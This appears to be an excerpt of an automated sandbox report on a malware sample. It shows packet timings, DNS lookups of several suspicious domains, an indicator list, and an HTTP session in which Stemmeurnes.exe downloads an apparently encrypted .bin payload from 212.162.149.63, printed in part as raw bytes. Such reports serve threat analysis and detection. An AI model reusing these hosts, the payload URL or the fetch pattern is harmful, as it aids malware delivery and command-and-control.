                                                                      Nov 28, 2024 10:06:17.678581953 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.678617954 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.680550098 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.680608988 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.680628061 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.680685043 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.682118893 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.682164907 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.682204962 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.682257891 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.683990955 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.684039116 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.684096098 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.684166908 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.685858965 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.685905933 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.685954094 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.686002016 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.687736034 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.687783003 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.687932968 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.687978983 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.689621925 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.689691067 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.689745903 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.689790010 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.691503048 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.691548109 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.691601038 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.691653013 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.693361044 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.693442106 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.693481922 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.693545103 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.695290089 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.695333958 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.695364952 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.695419073 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.697114944 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.697176933 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.697212934 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.697335005 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.818203926 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.818294048 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.818300009 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.818361044 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.818977118 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.819031954 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.819086075 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.819145918 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.820645094 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.820713997 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.821247101 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.821297884 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.821347952 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.821386099 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.822942972 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.822994947 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.823054075 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.823103905 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.824644089 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.824744940 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.824744940 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.824776888 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.826284885 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.826335907 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.826392889 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.826436043 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.828002930 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.828125954 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.828130960 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.828190088 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.829638958 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.829711914 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.829787016 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.829842091 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.831321955 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.831396103 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.831410885 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.831450939 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.832981110 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.833025932 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.833030939 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.833076954 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.834683895 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.834739923 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.834822893 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.834902048 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.836355925 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.836401939 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.836525917 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.836585045 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.838013887 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.838074923 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.838187933 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.838234901 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.839713097 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.839832067 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.839842081 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.839894056 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.841339111 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.841387033 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.841444969 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.841525078 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.843053102 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.843127012 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.843192101 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.843250990 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.844702959 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.844763041 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.844805002 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.844855070 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.846528053 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.846600056 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.846637011 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:07:56.785214901 CET4974180192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:56.791304111 CET4974180192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:56.911431074 CET80497413.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:08:02.877522945 CET4974280192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:02.997661114 CET8049742103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:02.997750998 CET4974280192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:03.013453960 CET4974280192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:03.133552074 CET8049742103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:04.526932001 CET4974280192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:04.647382975 CET8049742103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:04.648797035 CET4974280192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:05.546375990 CET4974380192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:05.666608095 CET8049743103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:05.666841030 CET4974380192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:05.681632042 CET4974380192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:05.801721096 CET8049743103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:06.770634890 CET8049743103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:06.770762920 CET8049743103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:06.770859957 CET4974380192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:07.261542082 CET4974380192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:08.285813093 CET4974480192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:08.405884981 CET8049744103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:08.406054020 CET4974480192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:08.423368931 CET4974480192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:08.543442011 CET8049744103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:08.543468952 CET8049744103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:09.552851915 CET8049744103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:09.553082943 CET8049744103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:09.553131104 CET4974480192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:09.933254957 CET4974480192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:10.952585936 CET4974580192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:11.072696924 CET8049745103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:11.072776079 CET4974580192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:11.082936049 CET4974580192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:11.203006029 CET8049745103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:12.231089115 CET8049745103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:12.231125116 CET8049745103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:12.232707024 CET4974580192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:12.236540079 CET4974580192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:12.356520891 CET8049745103.168.172.37192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2024 10:06:44.401035070 CET | 63813 | 53 | 192.168.2.6 | 1.1.1.1
Nov 28, 2024 10:06:45.008178949 CET | 53 | 63813 | 1.1.1.1 | 192.168.2.6
Nov 28, 2024 10:07:01.327617884 CET | 59803 | 53 | 192.168.2.6 | 1.1.1.1
Nov 28, 2024 10:07:01.981430054 CET | 53 | 59803 | 1.1.1.1 | 192.168.2.6
Nov 28, 2024 10:07:16.781925917 CET | 54813 | 53 | 192.168.2.6 | 1.1.1.1
Nov 28, 2024 10:07:17.198312044 CET | 53 | 54813 | 1.1.1.1 | 192.168.2.6
Nov 28, 2024 10:07:31.656219006 CET | 55576 | 53 | 192.168.2.6 | 1.1.1.1
Nov 28, 2024 10:07:32.000127077 CET | 53 | 55576 | 1.1.1.1 | 192.168.2.6
Nov 28, 2024 10:07:46.796545029 CET | 65058 | 53 | 192.168.2.6 | 1.1.1.1
Nov 28, 2024 10:07:47.263221979 CET | 53 | 65058 | 1.1.1.1 | 192.168.2.6
Nov 28, 2024 10:08:01.796549082 CET | 56249 | 53 | 192.168.2.6 | 1.1.1.1
Nov 28, 2024 10:08:02.792721987 CET | 56249 | 53 | 192.168.2.6 | 1.1.1.1
Nov 28, 2024 10:08:02.874437094 CET | 53 | 56249 | 1.1.1.1 | 192.168.2.6
Nov 28, 2024 10:08:02.930182934 CET | 53 | 56249 | 1.1.1.1 | 192.168.2.6
Nov 28, 2024 10:08:17.249871969 CET | 64490 | 53 | 192.168.2.6 | 1.1.1.1
Nov 28, 2024 10:08:17.834805965 CET | 53 | 64490 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 28, 2024 10:06:44.401035070 CET | 192.168.2.6 | 1.1.1.1 | 0x4665 | Standard query (0) | www.carhireheaven.online | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:07:01.327617884 CET | 192.168.2.6 | 1.1.1.1 | 0xede | Standard query (0) | www.dy01urj.pro | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:07:16.781925917 CET | 192.168.2.6 | 1.1.1.1 | 0xa8f1 | Standard query (0) | www.openhorizons.pro | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:07:31.656219006 CET | 192.168.2.6 | 1.1.1.1 | 0x2064 | Standard query (0) | www.topkapiescortg.xyz | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:07:46.796545029 CET | 192.168.2.6 | 1.1.1.1 | 0x1fbe | Standard query (0) | www.thezensive.work | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:08:01.796549082 CET | 192.168.2.6 | 1.1.1.1 | 0x99e8 | Standard query (0) | www.lucelight.info | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:08:02.792721987 CET | 192.168.2.6 | 1.1.1.1 | 0x99e8 | Standard query (0) | www.lucelight.info | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:08:17.249871969 CET | 192.168.2.6 | 1.1.1.1 | 0xf5cb | Standard query (0) | www.kevmedia.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 28, 2024 10:06:45.008178949 CET | 1.1.1.1 | 192.168.2.6 | 0x4665 | No error (0) | www.carhireheaven.online | carhireheaven.online | | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2024 10:06:45.008178949 CET | 1.1.1.1 | 192.168.2.6 | 0x4665 | No error (0) | carhireheaven.online | | 165.22.38.185 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:07:01.981430054 CET | 1.1.1.1 | 192.168.2.6 | 0xede | No error (0) | www.dy01urj.pro | | 154.88.22.104 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:07:17.198312044 CET | 1.1.1.1 | 192.168.2.6 | 0xa8f1 | No error (0) | www.openhorizons.pro | | 69.57.163.64 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:07:32.000127077 CET | 1.1.1.1 | 192.168.2.6 | 0x2064 | No error (0) | www.topkapiescortg.xyz | | 104.21.6.17 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:07:32.000127077 CET | 1.1.1.1 | 192.168.2.6 | 0x2064 | No error (0) | www.topkapiescortg.xyz | | 172.67.134.42 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:07:47.263221979 CET | 1.1.1.1 | 192.168.2.6 | 0x1fbe | No error (0) | www.thezensive.work | thezensive.netlify.app | | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2024 10:07:47.263221979 CET | 1.1.1.1 | 192.168.2.6 | 0x1fbe | No error (0) | thezensive.netlify.app | | 3.75.10.80 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:07:47.263221979 CET | 1.1.1.1 | 192.168.2.6 | 0x1fbe | No error (0) | thezensive.netlify.app | | 3.125.36.175 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:08:02.874437094 CET | 1.1.1.1 | 192.168.2.6 | 0x99e8 | No error (0) | www.lucelight.info | | 103.168.172.37 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:08:02.874437094 CET | 1.1.1.1 | 192.168.2.6 | 0x99e8 | No error (0) | www.lucelight.info | | 103.168.172.52 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:08:02.930182934 CET | 1.1.1.1 | 192.168.2.6 | 0x99e8 | No error (0) | www.lucelight.info | | 103.168.172.37 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:08:02.930182934 CET | 1.1.1.1 | 192.168.2.6 | 0x99e8 | No error (0) | www.lucelight.info | | 103.168.172.52 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 10:08:17.834805965 CET | 1.1.1.1 | 192.168.2.6 | 0xf5cb | Server failure (2) | www.kevmedia.online | none | none | A (IP address) | IN (0x0001) | false
• 212.162.149.63
• www.carhireheaven.online
• www.dy01urj.pro
• www.openhorizons.pro
• www.topkapiescortg.xyz
• www.thezensive.work
• www.lucelight.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49724 | 212.162.149.63 | 80 | 5860 | C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 10:06:15.739025116 CET | 181 | OUT | GET /kybqONxtMLpRGBHO51.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: 212.162.149.63
Cache-Control: no-cache
Nov 28, 2024 10:06:16.974071026 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 28 Nov 2024 01:28:21 GMT
Accept-Ranges: bytes
ETag: "9c71cdcf3441db1:0"
Server: Microsoft-IIS/8.5
Date: Thu, 28 Nov 2024 09:06:17 GMT
Content-Length: 287808
Data Raw: c1 da be 24 81 c7 dc 68 b2 10 9e ab a9 7a a9 e5 0e 94 46 fb fb 66 ef fb 5d 2a 15 52 ba 0b 74 3e 2d 52 af fc 14 03 58 32 3e a6 f3 9f 30 8c 9b dc 8c 64 86 0a 28 61 7c 08 d3 43 33 f0 29 8c 4c 31 2f fe 8e 32 46 05 18 4c 3e 41 ec 08 a3 1a 4f aa bb 5c ff 0a c7 88 72 49 49 21 37 84 4a f8 7d 25 00 3f f2 d9 30 bb 6e 35 98 55 48 95 58 f4 a1 f6 52 b3 6a a7 0a 11 91 fc fc 83 f1 44 2f 67 f3 b6 5c 0d aa 24 54 f0 8b 90 f9 7e 02 d0 5b 69 13 d3 05 7f 1c 2a 76 3c a2 58 17 d5 1d 70 2f 35 bb 8c 52 b9 5f 7b d8 4d 3c 28 f4 92 d7 da 55 77 77 ef 55 92 49 35 a3 b9 77 47 0a 65 8e 4b 02 30 64 83 97 fb f3 b9 7b 0a af 68 32 e4 ff 5d 6a 84 6b 87 a1 63 70 b6 60 ea e1 e1 65 22 04 2d 3c 40 7a 78 4e ec 70 cb f2 37 a7 58 e8 70 6a fc 27 44 73 52 cb da aa a4 6b 7a f7 bf 98 ee 9b 1c 89 b4 24 02 68 75 e0 00 62 92 a8 ad 1e 1b 86 ab c2 ec 2f 83 28 16 6f fd a7 b6 f6 50 09 ef cb 3b 73 e0 e6 bb 9f 13 ec a7 7d 32 0f 04 29 2f 74 b2 aa 68 5d ee 68 3c 72 ea 27 e6 29 8e a8 eb 3d 75 1b 3f ae b7 b3 1d 5a 23 37 25 ec e8 6f f1 44 34 ce 66 e3 f5 db c7 [TRUNCATED]
Data Ascii: $hzFf]*Rt>-RX2>0d(a|C3)L1/2FL>AO\rII!7J}%?0n5UHXRjD/g\$T~[i*v<Xp/5R_{M<(UwwUI5wGeK0d{h2]jkcp`e"-<@zxNp7Xpj'DsRkz$hub/(oP;s}2)/th]h<r')=u?Z#7%oD4fiZ;$F_Ti41`:c.=#ZVuVuK='V/v>?2.5FSJ#3FQmNH1)(YY082qke>7rQ(9hT5eDI .CMB,y]U!z/c&\U.Aig[@[%=}|\ZNR1e4&B![Q@XCXJtcer/ }s"19nm;<HcX<_mwj)eHzZLD[Dr-VGA}#K FCAL'eDU=}J]YA0_:{.pfQ.3L<@o"`K#K!r!Cy-.%D#:5GKll~nq5S:F|?oli~yRwnQBsID]J_Q/P_I%%o)(tpu+=uj?x^)_rMa|`NqX`f`
Nov 28, 2024 10:06:16.974107027 CET | 1236 | IN | Data Raw: e5 8c be e8 58 83 63 19 e1 42 b3 84 82 72 4e 3c 78 cf 49 8f ec 10 30 cc 0d 56 5d 3b f7 f2 26 15 10 cf d4 db ef 94 58 07 3c 35 98 38 f9 1a d8 49 90 d0 27 d3 a0 1b 1b 98 bd a4 60 03 40 99 51 a7 23 9c 4a d9 2e a6 16 e5 87 a0 5f 3e 2c fd 80 b9 5e 7f
Data Ascii: XcBrN<xI0V];&X<58I'`@Q#J._>,^3CEo84o0V`"M$`RAe4.s!c-n0#>_q[R Zhjy!AP"oVq/&Xtj0WVxC$<w,e|O
Nov 28, 2024 10:06:16.974118948 CET | 1236 | IN | Data Raw: d4 d9 fd c2 6c c7 7e 6e cd cc 71 35 53 9e 3a 96 46 17 d3 7c b1 ff 3f 6f b2 6c ac 69 7e dc 79 dc ff c1 ba 52 77 e9 6e 51 d1 81 93 af 42 ae 9a 73 f2 13 ef 49 44 89 5d f5 4a a7 00 c6 1a e7 5f c7 51 98 2f c4 50 5f 87 b5 49 dc c6 c2 a1 eb bc fa 25 b6
Data Ascii: l~nq5S:F|?oli~yRwnQBsID]J_Q/P_I%%o)(tpu+=uj?x^)_rMa|`NqX`f`XcBrN<xI0V];&X<58I'`@Q#J._>
Nov 28, 2024 10:06:16.974214077 CET | 1236 | IN | Data Raw: bf ea 14 14 ca b6 b5 e0 6d e2 10 f4 77 98 6a bd bc 91 c6 29 a0 65 48 7a 97 b4 b4 5a 4c ad 44 5b 44 72 2d ff 56 47 12 41 7d c3 ad 23 4b d5 04 0a cf 20 83 46 b7 b4 43 41 a2 4c da 27 b8 06 65 44 cb 55 3d 7f 7d 4a 5d 8a f6 a6 59 13 41 8b bd 30 5f 3a
Data Ascii: mwj)eHzZLD[Dr-VGA}#K FCAL'eDU=}J]YA0_:{.pfQ.3L<@o"`K#K!r!Cy-.%D#:5GKll~nq5S:F|?oli~yRwnQBsID]J_Q/P_I
Nov 28, 2024 10:06:16.974225998 CET | 896 | IN | Data Raw: cf b6 50 01 22 da d4 c1 5b 7c 12 19 d2 93 29 97 26 1e cd 56 b9 8d 91 45 6e d9 a7 50 20 03 57 5f 60 d6 72 86 97 8e e4 8a 81 fb b5 0e 69 b5 40 b4 95 fd 08 20 2a 90 68 14 7e 09 86 43 36 1e 2d 00 b6 0e bb c2 e7 c6 bb aa 6d 42 35 15 d2 63 0b b2 05 1a
Data Ascii: P"[|)&VEnP W_`ri@ *h~C6-mB5c q:EjJyw_>l dAu|\_X.}L#P?afmHc<_+%AYSOl\uts=Rh8bee bc.eU=]-
Nov 28, 2024 10:06:17.004448891 CET | 1236 | IN | Data Raw: e4 a2 b8 ba 1a b8 e6 11 8c 48 1c 3c 62 d5 f0 2e 41 8e a5 75 7d 99 37 fa 5f f2 0c ec 26 55 74 7c 34 f9 89 43 02 75 d2 6d 21 98 a3 81 ba fc 71 68 8a 99 36 1d ec a1 cb d1 a0 91 49 60 06 90 91 f9 8d e8 c8 a6 7f 66 24 10 9c cb 54 43 f7 59 4e 2d 9b 96
Data Ascii: H<b.Au}7_&Ut|4Cum!qh6I`f$TCYN-%K8w"#J-Og}DMjqa[4J@Hg]QY*=.1GP_t(=H:Y921<.NyK~&JCtS#{QeB3
Nov 28, 2024 10:06:17.004507065 CET | 1236 | IN | Data Raw: 30 ce 41 34 c0 52 61 9a ab 2f 65 1a 2c eb 33 1d 7d c0 76 d2 af 12 44 ac 07 92 4f 6f 0b 68 b3 59 c8 6c 6e bb 45 35 80 63 aa c1 df f4 8b 07 cd 81 26 6b 0f 09 0a 2c 72 7b af c8 76 c4 e0 cd 2f 6e a8 11 67 5f da c6 b3 99 bb d8 87 18 26 61 4a f2 25 a6
Data Ascii: 0A4Ra/e,3}vDOohYlnE5c&k,r{v/ng_&aJ%KNeKuhq`Mw#uAiO^=V=G->={QdP9$DfC3ct{:3p<rv#&nnL>qC5eg$7]h?|)
Nov 28, 2024 10:06:17.004520893 CET | 1236 | IN | Data Raw: a2 9b a8 6c 56 02 ac d6 95 df 6c ca 54 66 b1 30 fe 80 b9 51 f9 6d ac 33 ce d3 2c f3 e5 7e b4 4c 01 7d 8b b9 36 ac 6f 30 e3 56 d8 f5 11 c1 75 f3 75 e5 67 9b 58 ba 11 b9 a1 ef 7c 34 36 0c 54 b9 6a 82 20 21 c1 fd eb bf 7c 37 59 c7 eb 21 e3 94 3e c3
Data Ascii: lVlTf0Qm3,~L}6o0VuugX|46Tj !|7Y!>z<-nMU_q0Su^,!#TbVWXv=RtOT6hNr p|SmzXSyyDOw"UM)~:a,?3rv|d<
Nov 28, 2024 10:06:17.004638910 CET | 1236 | IN | Data Raw: a6 2d f2 6d e2 58 f5 6c 05 f1 b1 75 bd b4 eb 2b f7 aa c6 7e c5 fa ee 1e cb a9 a3 93 a7 17 0e d7 0c 6c 2d 12 e0 9f ea db 19 04 15 90 c3 10 fa 9d fe 74 9c c5 3f cc 4a 69 fa 3b 6e da 47 6e d8 23 bb 04 bb 43 3e fb a7 ae bd d0 93 5f 2d 86 2b cd 4d fc
Data Ascii: -mXlu+~l-t?Ji;nGn#C>_-+M:!?9#]4yIbVOW8:9UY*<{[b%O`yA*!"vH0VECLoeal"gGUsX%A.wCV
Nov 28, 2024 10:06:17.004651070 CET | 1236 | IN | Data Raw: c5 ee 01 37 0a 63 24 f6 af 00 49 7d d3 55 96 b7 ff 6d 89 de 04 7b d0 96 e8 71 c5 f2 87 0a a7 12 89 da 41 6d 70 31 30 86 e1 1e b7 40 11 83 01 0e 46 49 1b 8c 53 90 f6 61 b7 ce 52 32 73 2a d0 17 6e 56 7a 7a e4 ad 8d 32 ea ca db ed 77 8f 36 98 2c 60
Data Ascii: 7c$I}Um{qAmp10@FISaR2s*nVzz2w6,`&#J`10<+]0=8!0F*d*="iw@/t2YHT&%.gTO01XT@1,2$yF{GQ_?|5-Dll"Avmz}
Nov 28, 2024 10:06:17.094274044 CET | 1236 | IN | Data Raw: d0 ff fc 77 62 b8 18 e7 7b f7 aa b9 53 66 92 02 e0 7f 53 d2 c7 30 e2 cd ef 8b 41 81 8e 6d 83 53 a4 5f e4 a4 d6 e8 58 cf d7 f0 56 6a ba 99 08 5c 0b f3 6f e8 d2 d1 c1 f1 8c 61 a6 ce ab 31 4d 7d 99 b6 c8 8a 96 41 71 d8 40 e3 ad ba 2c 64 d9 3e c9 ae
